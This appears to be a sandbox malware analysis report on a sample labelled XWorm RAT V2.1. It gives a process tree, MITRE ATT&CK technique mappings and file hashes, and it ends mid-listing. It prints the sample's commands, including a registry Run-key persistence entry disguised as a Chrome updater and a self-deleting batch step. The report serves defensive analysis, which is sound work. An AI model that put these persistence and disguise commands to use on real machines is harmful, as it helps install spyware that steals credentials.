C:\Users\Admin\Downloads\XWorm-RAT-xworm\XWorm-RAT-xworm\XWorm RAT V2.1\XWorm RAT V2.1.exe
"C:\Users\Admin\Downloads\XWorm-RAT-xworm\XWorm-RAT-xworm\XWorm RAT V2.1\XWorm RAT V2.1.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:6908
- C:\Users\Admin\Downloads\XWorm-RAT-xworm\XWorm-RAT-xworm\XWorm RAT V2.1\Command Reciever.exe
  "C:\Users\Admin\Downloads\XWorm-RAT-xworm\XWorm-RAT-xworm\XWorm RAT V2.1\Command Reciever.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SendNotifyMessage
  PID:6620
- C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe
  "C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  PID:6516
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpD2C8.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpD2C8.tmp.bat
    3⤵
    PID:7312
  - - C:\Windows\system32\tasklist.exe
      Tasklist /fi "PID eq 6516"
      4⤵
      Enumerates processes with tasklist
      PID:7592
  - - C:\Windows\system32\find.exe
      find ":"
      4⤵
      PID:6952
  - - C:\Windows\system32\timeout.exe
      Timeout /T 1 /Nobreak
      4⤵
      Delays execution with timeout.exe
      PID:7428
  - - C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe
      "C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Loads dropped DLL
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of SetWindowsHookEx
      PID:8004
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdater /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe /f
        5⤵
        
        PID:8040
      - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdater /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe /f
        6⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:2864

C:\Users\Admin\Downloads\XWorm-RAT-xworm\XWorm-RAT-xworm\XWorm RAT V2.1\XHVNC.exe
"C:\Users\Admin\Downloads\XWorm-RAT-xworm\XWorm-RAT-xworm\XWorm RAT V2.1\XHVNC.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:6400

C:\Users\Admin\Downloads\XWorm-RAT-xworm\XWorm-RAT-xworm\XWorm RAT V2.1\Command Reciever.exe
"C:\Users\Admin\Downloads\XWorm-RAT-xworm\XWorm-RAT-xworm\XWorm RAT V2.1\Command Reciever.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:7372

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:1020

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
93ada953fd9f7b4b992ed7c0910f5b1c

SHA1
c02ae9f95770742931076dada421132f97af7017

SHA256
f5faae7cd5d088a2cd8b81a935d51dcd58d229386bc27d63c4fd1fdbe676e539

SHA512
3e80e838ee53448543b57ed6a589261ec61f7c09103c0431acc891e8afcef854a2537a3f56d99d2280d1d75cc93b37b93908963b83883baef1953cb7d3b5f521

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000012

Filesize
33KB

MD5
2f4289196f911ef06e3c01214dd113c3

SHA1
bfdea965796346bf8b453b9131aa14cc050dcfc7

SHA256
688b98eba2e8323967008dc50dc7688530c0deb2bea8504d3bf29a1d2f8f51a0

SHA512
ea1487a16484d2a42463e5e7f6ff442271d17482e1a1ff3ae2ab29649bd37dc84c9371b9ac21b955763fc6ee0dee77ca2d45cbfbde2d8e03de7f9f969eef1669

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000013

Filesize
153KB

MD5
1b2731006f2b2597b02859e501bc2d4c

SHA1
118d27a703cef3fb083593a56bbc93e62420f30a

SHA256
59dc184cbc1a318493460d1d78999cfdaaaac9a457b5a3a02c2567dfa17314bd

SHA512
f7452f91afe2fbfcb04f80dc7b051d874224de8790bbc53858678332a6b49f7295a15989a587811e1e8fb58a38625ec3e15657d88a367fd50d5b201d7abbe90c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001e

Filesize
1024KB

MD5
722a5c8e9a28cf3220825f4e555176a3

SHA1
c662f0371ee534a0e20b1b9e6a5f49e4609fb86d

SHA256
21b7757220221262068a3943e4c7ac09e690e65c40403f3a20af4f58d1e5cf81

SHA512
0a9cc0a324b3bbc7046be76103ea9c909d6bce6017cfb7c409344d7610b8d720be6e115775ff56b4ade6e304e69cdd944482d5f2511865dd30bd60afd0282291

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000038

Filesize
67KB

MD5
bcfda9afc202574572f0247968812014

SHA1
80f8af2d5d2f978a3969a56256aace20e893fb3f

SHA256
7c970cd163690addf4a69faf5aea65e7f083ca549f75a66d04a73cb793a00f91

SHA512
508ca6011abb2ec4345c3b80bd89979151fee0a0de851f69b7aa06e69c89f6d8c3b6144f2f4715112c896c5b8a3e3e9cd49b05c9b507602d7f0d6b10061b17bd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000039

Filesize
51KB

MD5
839cc77d6a130089ab3f4fb615871aec

SHA1
6e2d6f62f20a84b4cece97ee45e403e53318b0d4

SHA256
145be6cee1b9f21d529582c05f594ee3d2ddbaa95f9fbe380375af63f8cc755a

SHA512
6617f8820886b6669fdc5cbf35a13f8d20603b0a2d29e71b05eb67574043d2a68327f436a05de264d95159efcdb89c0f754d055130616a31d3b5c4cc9537b0be

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00003a

Filesize
60KB

MD5
ede84d96808c486e3de74cbd8f2a2c80

SHA1
bae3ce34f928be471ee489bbfe5b7425aee8298e

SHA256
02f1dcc0c722e24cba9be4b720831a79489e766d5edf8b77f582e0869312d86e

SHA512
996d7258dd45f8676916f05138e7f3141abd7c0207ae43ca820a10211bd237c6bdac0209967b45c4a1d27c08dbaad2f933d16d0400b0710981804e651d4b804b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00003b

Filesize
60KB

MD5
1033a47731e45f7bd46a1962359e96b4

SHA1
ac6abef8d1819a685db48a9515f77a24a153e2a0

SHA256
61c412fbdbbf1417355373a80125c8cf7e5cbaab4218bae0316fe6ef917bf798

SHA512
84ca95f89e0a16efd962b44bd3f7ffe09b328f33c068acd8a1fefd08101d824929e8b9eeccb0786483aa2fd2c60bd0b76fc2242479268d69faab72c48902e34b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\158c528762a2d787_0

Filesize
284B

MD5
a50d899090aaee343d6b79551e83c9bb

SHA1
c74e213be3f8c7936bd7794fedd9ec8c276e243e

SHA256
8d3190888f798674d8bdd3eed3f7a1fd38ea92a2b024e8cf4e99b7f2369a3d7e

SHA512
0969f03f6881f869e27ae4b8a7f450a11c49d23ff7848e1b73911c9a19980193998ed2676915801cf09bbdf0a0d2b1006ba49b7e2c8601692f663c6cad6ffb1b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\22e0d3f684b5dd03_0

Filesize
452KB

MD5
fe2a7fb8844de6e665a3f89ee1fbe613

SHA1
27dce08209659ef0715995680f319e1de1c818ab

SHA256
85c4c7467348df0bad015b663d240554951e50fa57a7455cd852ba9e25f82f70

SHA512
79e7d3480ec2073e23e1b9f675fe291926dea96086c9963682b33ec4578b62378a2f2bafa4551da037ed08a5c0ebfa71a80e58c2adcbe81563dd6eb29b54de87

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\323d5f03672750b8_0

Filesize
22KB

MD5
20ffacb65bf0128f59f4cb2e931ca94e

SHA1
b3c0db1a33163938380e3fb4a9c4ec4b18799fb3

SHA256
448de70a00ab5547e2b0c77ab2e27ed394dd573764a36a77d858086dd561ac82

SHA512
248683806de3e3889c74990432e9df9d6d07f5917fc31c0a150f458519711b2fba77d2fdba17f40413bb873892edc741262739e46b9e81720f8cc1ac1a805f3b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\336a68eaaf209f48_0

Filesize
309B

MD5
a8d6d45b51d0ef9522542f2fbff06e86

SHA1
1de373a333b2cda758fe88e7e15dbd5806fe48e7

SHA256
95a77cacb76e128771f1abf6dbabc146786d26eb98b4e1cdfc7deab78a15d59b

SHA512
db50ef5a19595615c61fd40183d4beac5378f8119140775c7305d54cfd6253eb9323e2e3114529832204442d379cb9438f775173a9fa9c7fc7fba011d813e851

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\35b517c3d3bfc96c_0

Filesize
202KB

MD5
4ef9af9e29f95405194f69613fb147ea

SHA1
7ab93b63d8065a4ec8851d382b79f5cd49b17c7d

SHA256
b5b8fc3c161a3980110178b63a4f3541e845658bb1b60cf80a6d71efb26d5829

SHA512
84ca22491e6b49bd1c9ef571c5db2ffd3d578af238009cc49f9f234f8ba957ac9fe8ed2ac42d1e576c7a32f3289a1a5a3fc958b633fa0a20a5e97610f396e187

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\50799fc5bd051db0_0

Filesize
49KB

MD5
6c5425c6a87857974d862db49e46b257

SHA1
3c141286fc533d9c2e672cf522c29a321a8eb8ea

SHA256
b13244d6c987114b4541cd5068cb350bc05ca8201bbcc09b2d38a7eb4b38ef58

SHA512
0e2a9b265e7fa72068a481181dae2cc62113387bc865494fe373270209d1fc6d2a53e0e3fbe7b2a62dea2dc15e01c15d2dd045f43542b23b5f4514f206947b42

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\776ee2a1b20d26aa_0

Filesize
51KB

MD5
abd1019d5221cd4875ac93c0dad68b42

SHA1
ebf17e3d3edf73df20b19e823058e7daeae787f1

SHA256
44930615fa7c22f11ef6ea284468feb6abbf89af06bc49d109843407fbf1c5c7

SHA512
b62f756161314a9b3f71671042dd12ff521dbc0e1d0d04da124a51e2f462c27b54f3d90aed1aa43bd3e9a961a373f1908eddc7580ae023cd8202745647c4f1cc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\77efb14a4769d95b_0

Filesize
293B

MD5
d6aa5e2abc2caf66dec3966d8f444975

SHA1
50d488a32c50edf7f008d546f31b382b649e249d

SHA256
11f686f0036b0093d2fcad5106a6c2c83039046231f3f00617f11b57030b1105

SHA512
0d92d9374fa1e8265a71080a98c316c37bb809505a01deee11b0babddcf6679686adbfc09c82cb64f08762b8b95eb4adef8e67c062fc62453d50a6ec2963fd5c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\cf81c3361495b856_0

Filesize
32KB

MD5
7c8781685b9b6b7ae35858e48d11a4ad

SHA1
cf40b9b7382e0a160a4821fb4c7b7920885f89ed

SHA256
746763d0e2b33a5469b71f178b2369059eae2ad11ce4747e91b71be25dcc065d

SHA512
3dda29d5fadc58f343330be55cddc037c13023a7168dc0e8a7f0bd0ff640595ffe9b501df2f38dbe03984a5fa4f62bf77de871c71a91480c2b4e95f8d38b3fb2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\da697940f1431678_0

Filesize
4KB

MD5
1c09622b67b4deb56527d5c5e08a5884

SHA1
c088431efeef6d37a160561a2879830e9d6eba81

SHA256
e9896e12d5102b9dca962e1b33a333202fcfb27c0ad327d664a26cd823d2701a

SHA512
23ae4c5d2fb1dd1aa030d6904dcf12e01eb5b561a7ea696e577a58d7e0b10b6eb5a7393f625e377085dc3b735e96f57ffaa1c1607cf12f1c2f85ca524e8902f5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\dd612e83819f93cf_0

Filesize
285B

MD5
0c74ce0b6cd4a16914d712361045d17a

SHA1
bfd6c0ae909e37b85b0fd6713e0f7f83143d19e8

SHA256
2d9e8320ccd10f66391006d3c00ef1165f8647b28e68fcd3918467629b742ad7

SHA512
2cf420eab5c418345bef1e7610be09433eb143fdc7cdba1a9856ad835eaf2ca3e018cd76623f329f2ebcfa7874586b1a1c8b5b79e96d2008c144ba9d010d33e5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\f94ac681a8d1f691_0

Filesize
316B

MD5
6c18ddf92b90059a0db7c38538dd7438

SHA1
296daa0d7e6f96a4738e13cdb7050669255e5080

SHA256
c7077e090742f4026db6c310a1e7cac0c763f6e0d91177b6b9403eb0e58fa19c

SHA512
af9606dabee5a27f86d84113d742c0083c2f6e8c47a2ae5aa26c248023953ec4e3171badb115048c76f4f476cb7e2d0eaa3065794811067b28f39af63d2c0c88

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\ff9b3bd273347b2b_0

Filesize
288B

MD5
8f2c81cb0487c323882b40c38e0bc8c0

SHA1
ff67de7249292f3af06f10edf64b5ce30fcfb70b

SHA256
6038deeed591980733a94d1c285e525681ab116d6313ec78b685203a71e5fc37

SHA512
eb2329791a8e792f4fe084a290f1059168176dca946883e138f613ca95e115166b9b2df2a76cbb3c5eca888be177d57a99ca523b1b1a30b69f5934543af327ed

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
effa3c2e8e2ae4733f644c88c3a539fd

SHA1
884715ef5cd9ef687d9edc193b6531cb49edbad2

SHA256
4b8860e952fa96ac9dba23414e5f1b1b61e5f046a42eae1e19527f6a691a2490

SHA512
873f64fca23c222e3bd576964d8a5a1c9c316d5d0270395b70bdb00e2582dba0e5c7f133eaa8945073fe42561222e13db56c7e744c30b03c5ca65ff1c065ae95

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
dc38e41eff31f616858e3a7c1d07ecad

SHA1
d16bdf15553013c15a15a486f72e2e134b581671

SHA256
dfbfcfa18f2d6d0182ca0d1c5b8a3585fe9bc9f70a89a3c9fa06c6dab4c6e153

SHA512
a330b99195bfc6a5e77e6c45b132cd09af0fd06eac0dc5877eb29a46c7fa9fe5b071b264a334328a2519446aca6cd70bd0036b5eb857c7361311b50f879acef4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.85.1_0\_locales\en\messages.json

Filesize
851B

MD5
07ffbe5f24ca348723ff8c6c488abfb8

SHA1
6dc2851e39b2ee38f88cf5c35a90171dbea5b690

SHA256
6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

SHA512
7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.85.1_0\dasherSettingSchema.json

Filesize
854B

MD5
4ec1df2da46182103d2ffc3b92d20ca5

SHA1
fb9d1ba3710cf31a87165317c6edc110e98994ce

SHA256
6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

SHA512
939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
10KB

MD5
5e79485d78832d9a2b65e5062f9cbb7d

SHA1
6590213d196b99e7d76b6b1160400a262d181df9

SHA256
049ec4772eece31f300d22c5c557e74eaaaf0dc3b368a0e0b2ff95c9948df9e3

SHA512
d8ad188e1a42c0aae20fe068572ddce5e6ce4bfdf12acb40a468ffaece8e3862d8dec8c6ce5c2b1fbf18d75c6ed7c9fa15bc05222dfeee9d9794b50520e72518

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
38KB

MD5
becc147e658d4f173ecae2c9a435362a

SHA1
6f3efc8fb945ea5fffc52af5c248b94f63c43a0f

SHA256
4441ec6baebc31aedf9a5ea7408c6948f8e417f7396c3eedad1579e79abfcf89

SHA512
5f48475708553fee278e5104b0d301ebe8f63d710dbea643505b7dcd54eda987a3db5a6e777f10358eb10ec3b3dbbd5271d49ff2e3ca527db4af547f1bb11da5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
5KB

MD5
25e88774f63e875f3c49bda00509e888

SHA1
c6699c8f61d06ffe8a0a3ee8a3ce3d24ddd8b666

SHA256
f2fd07112cdaf711099e2ba186ea738c7d00c03c032cc9b082950c29cf167d40

SHA512
a3422f3655cd3581ba49ed799cf9005353baec7e4acfd2305943d3da3cfb7e30bf783b15f199e50f82f91f0cd386717773fb8bb7656cedf166586829fc66db50

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
354B

MD5
ac1e421e4b90a708dcb1a5a63253d36c

SHA1
c5fdc8b80256cb4f992150bc51a5b3b102d93754

SHA256
42ca6de74da997aac58c1dac2587367c0cd81dc840b9700c0ce495dc70e552ee

SHA512
a01953465cd058f3b5bdcd2192e8c1343fd3e5d3539d498fd47addad17595d7f1eb9442240c3d6898fc85652700c8c6812daabb73e81a5a21f01c9be2fe6bd79

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
4KB

MD5
478eb021b1d37e8603b40a860055afbc

SHA1
50faf051c511414f2a90b0efa1129103c2397ec4

SHA256
501ee5aa88b5060fc3f37e98c04fad27324412dc14652e5c6f83529a15b77106

SHA512
c4a196ec168678f06dc23001525b82c94ebefe4a41fab91c29c0337aaf5958a6bce0ff3911c1a31e95860a099eb58344e769363c4ed80a6629aafa50a6e7960a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
5KB

MD5
792ddc9ce699c2e30f542286fcb75186

SHA1
0aea19aa1a712f475ce3b1ddb7d8a496760818d5

SHA256
bedd51210fe78aba7cd5be64d7e8d0bcc1400e7cd7585592067fc10d6c331cfc

SHA512
cbd0264f7a8309a5709e5646ed36c081808248ebdbd1ea77ad213062f912cbb8e3a8a241f90105be09486ee81890363ca2efd334d3a92ba2f51cacb436efbfd5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
3751c5bf49560ab97404aa283bf6c880

SHA1
faf3c66861ef4e36aa14c42fe7dac37a02ce0e03

SHA256
da1431ff506ad991cb3c1e53bebc661c17bf6948eb5d939bf6a914e0afb0702e

SHA512
7377e3b70a85f3ed1e5254594114e7a5c070c3d523ee182bb73b15bbca29d30e29e104cbd138659d1be5516ae837248e61f3cb64d940bbcc053e406777ceb817

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
56911585932e14450f749c7cc0bc2518

SHA1
6e2e351916cd0ce344c29ef4c3814a61d7d00c5e

SHA256
0b9846a3088c00a560c32228d74ae77a7e4b92dc4ee0765d7481369f32223f07

SHA512
97d8443b598a279a161ace4d9b4f450b006dabb7d3ad633d71d7e1f45e6e6169fe51b86762c52a2069b43f6a41d445138d938e6efd593eb964a5e8bd1cf78d70

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
20682d2d1c5e5fe9253b0d4ff484c768

SHA1
8e3e6241afff1a2a4c3dda33738b305abba4c592

SHA256
eced80534bf323317596b0f1aa7bd6aa593f93735689e30244fc277bd9d1f932

SHA512
865b38239470002825e289b816e8545e2da468d13b14c780fab808482814d7be16978350f577cccb2d9e68aa81702adb4b936de24e2e32ebb0dba68fdb781e4a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
eedc6c9fdfdb76ee1dc8bea75c50bfbe

SHA1
2d04f017adc5ca543780dab0c53c4f19c73104ca

SHA256
b46790fb15f7e6fcbe17b379131087f5cdc695d85e21bd2c697d25b4fc2612f8

SHA512
cea1dc2a73e4f95991b62b2dc86e631dfbbf8901435963d446b50752c42477727da2894181e40b523dc923b02bec9fada183c4bd1e5e8023f83844a9fb870704

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
78e0668f6d57b775d363e58f80924867

SHA1
f90938cb95ac944a6c8aec4d4c8c991bd598d744

SHA256
8ff630bd837d5fee7fca28fa6847b00067ab1f397ad1d30071d86b77efd4e8af

SHA512
736fe81ab170e51fd6b96e5489bcbb3dd86ac6faf090e57bbd4fe4037886537473491d54016b33a891fd97acb5f008f964cc17b6c183c689397786d9057dd229

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
311106adbf1be4051cb7c0cf333e67d1

SHA1
9e3b0f9419cc844cabd51533b88f7ccae8c60203

SHA256
1aed8e9da704634a74cca66d1630a2dd1eca2e7d2ddf8da60dedb9d38c17d9c1

SHA512
da47cc9430613f37ccab73db27d429fc95300fb2b36109e487e6d9b3e2bb1a4712a4345c682886734c76f07a9d4232276cb8feedd41687d01515e41fa00bdef9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
dde2dfb1eaf596d2bb57b1e2761e6a78

SHA1
d0a1669a1fce62ad89bb1f2b1f20e2e355a93d5f

SHA256
d2731bed418f570f30d4d70fa0c065a63eedfb2594b11c484f9adefe839f34c6

SHA512
80df457cec91bb618d6c6c701760dc55d9c19c3aab7dacced0910dc0e7512abdd68f917f22a755a8c8e05fc206dd624ba4de6099bf0614d7beebaf5d166b346b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
36351164733c4b18ce34f8c86d81e95f

SHA1
73f07fc6ca1463d1264493acf989ece9622d0fbc

SHA256
6db3ec5fa3eb2530d841136d132f354a43b82449c7fda8db3fb16f24a361a2c9

SHA512
54f6bdbaea8d9dc568112fa8731d9272ee7bcfe3b9ce91aefc302b91d93058b5532183b968317cde4004f087981a1f942c46ec6b06898256fa3dc56b1581bf77

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
d673ffd7edb3dcd75403ea99f1828112

SHA1
4e703dfb673f25532d36d7be270d8f46a94b1d23

SHA256
6ef8b801d0cc1ac6ceb7e31967c8b218be20dc697236d1996c6db75557191c22

SHA512
3af4c9ff5ea83d3856a4132293d23688305282d6853ed3ee83adb75bf38aac75fe255694270d7c02be96c8b3c042e7a3b94defdab0a668a2f3153e71b961dc2d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
2d1e3ef5e8e02bc4d944a58b8af26026

SHA1
48a24f81c8cd1ed7fe6163fda7809fadb4335c5b

SHA256
0f5aab7a3e40b20004c41a5a49a790d959aa58c786b0a42009d8b9542f479377

SHA512
ffd17e936635fb705e89f1958e3f1e05816a3b93161db21517cebb09a4656d4f609148a9c5c3a16d2e41c1306cfd1b33852221d26fc129e6cb0db8fca0e5f4bf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
4d93ac2b05e4f9d33b979fa2b90b10cf

SHA1
356aeaab0110f7c28b5a6c4c566fb030402fe204

SHA256
67077b4e32307bc388d0a89d15c9c628d8ea845f3e5016d212208afb81ea7c74

SHA512
626e1a7428d543fa6df011863e8adbc7cfded1a1766d80ae54de98006d2b8422747b14d2321ab4332702acefe2fb9ae3c78884c53e0470434de24ed9af8a5ff9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
f4a1d6973027eb1ed77d21ec73873ee8

SHA1
02236d2f5e4c99652339e610f88bf0421be5e0df

SHA256
2c169a8f02f8842145f7c789daf4b0b11cf65c977f25422266539979261e3f1b

SHA512
1cc761de95f9883be4f3c53a959653eae3705c01a9a2a4c3078a5b77ea9bddaf3334b610adb321c3b82001461ac9549abc39c3811f8879f76754bf7dc0da0c46

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
1863e297d0f6a4ef5ac838fa3a38cc69

SHA1
f9b48619d47d004394a664e07e9f4677190f5750

SHA256
e7c6a25617307c8ca3c1d49ee520ee46366b6c543700bea2bdbd955212350913

SHA512
1c5d167e42aae420b0f8f37ad0bc1becafef88018385dc9399815ae97738edc5d7659df24622e85341928c9174db91b08bcb24fb7de267b85e23761faca850cf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
ccfa91ccc6a75aad8f562c96e7b1638e

SHA1
a7aa837ce836ba923b6c5b481fd04d1266819243

SHA256
fc2de133ef5ae503355be71643e82556c9b1dcfb1f42c0419ed5acf5df1987a4

SHA512
19446e4121bdfc0ff4111f972b33a064700516cef27a8bd6724127d6640117ec3406add9bb20e515e94bd5f66eea211b365af287cc2d1123c7bb42be5d5944e1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
8ce6f67ca51a6480d9ec18e27654b080

SHA1
c96e07796dac222f9464e88d3e24e81136774faf

SHA256
54d5c1b6d75010422cb912a752edcf9a4e4d980ffdc8170d4e1467367032bfab

SHA512
cb8fb988d0aebb35ba70a91935b468302167241bab87aa86bab0af7f9b785ee07d3df918ccb0157cdc8d5c22755f5b2ae5edc1dfee95b1d989afd0e8e9bb5a38

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
231KB

MD5
b876e28d4813ef99e20cd969b961bedd

SHA1
7321a0bfa98842e898c595a9c53f552815372891

SHA256
6d9285cff77d5d7419a1d369c01fcc1a72648d5fb4cdd71fd0d16dadeb1abd9e

SHA512
55e2ddf752cfef26ae5dc263f6368c3598b2c81e6620dd4d3f016e5515c2820ffdc9e5e527560d50f33ee2cfcd44081d7dc9ea36e9a111bc820b46f1908456fd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
231KB

MD5
a832451b8b7435b34ea24d1e9650d71f

SHA1
c74612bf1b6f25b59c51b83aad1da3ad6dbaa711

SHA256
90a9afdd6a52102b40ac7c6432f925e71ef187f77be6977e73d0c89b9d391717

SHA512
54d2048c053ed77b97ccf6929e4d9f43b7c3442c3a5e15fed356124a8ba335f008cf4663f33fa4afd841eeb2a3f51c34f059162530375225993ca9791a0ff9d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\1a5fdae6-8f46-4b8b-a738-d6572f690d43\AgileDotNetRT.dll

Filesize
94KB

MD5
14ff402962ad21b78ae0b4c43cd1f194

SHA1
f8a510eb26666e875a5bdd1cadad40602763ad72

SHA256
fb9646cb956945bdc503e69645f6b5316d3826b780d3c36738d6b944e884d15b

SHA512
daa7a08bf3709119a944bce28f6ebdd24e54a22b18cd9f86a87873e958df121a3881dcdd5e162f6b4e543238c7aef20f657c9830df01d4c79290f7c9a4fcc54b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe

